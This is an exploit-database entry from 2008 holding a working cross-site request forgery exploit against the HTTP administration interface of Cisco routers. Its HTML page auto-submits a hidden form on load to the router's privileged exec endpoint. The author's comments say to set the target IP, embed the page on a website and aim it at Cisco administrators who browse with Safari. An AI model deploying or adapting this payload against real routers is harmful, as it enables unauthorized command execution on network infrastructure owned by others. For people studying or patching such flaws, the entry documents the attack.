Lucene search

K
exploitdbJeremy BrownEDB-ID:6476
HistorySep 17, 2008 - 12:00 a.m.

Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)

2008-09-1700:00:00
Jeremy Brown
www.exploit-db.com
36

AI Score

7.4

Confidence

Low

<!-- Jeremy Brown [[email protected]/http://jbrownsec.blogspot.com]
     Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit #1
     Replace "10.10.10.1" with the IP address of the target router, embed this in a web
     page and hope for the best. Cisco Admin's + Safari are the best targets ;) -->

<html>
<body>

<body onload="asdf.submit();">



<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">

<input type=hidden name=command value="show privilege">



<input type=hidden name=command_url value="/level/15/exec/-">

</body>
</html>

# milw0rm.com [2008-09-17]

AI Score

7.4

Confidence

Low

Related for EDB-ID:6476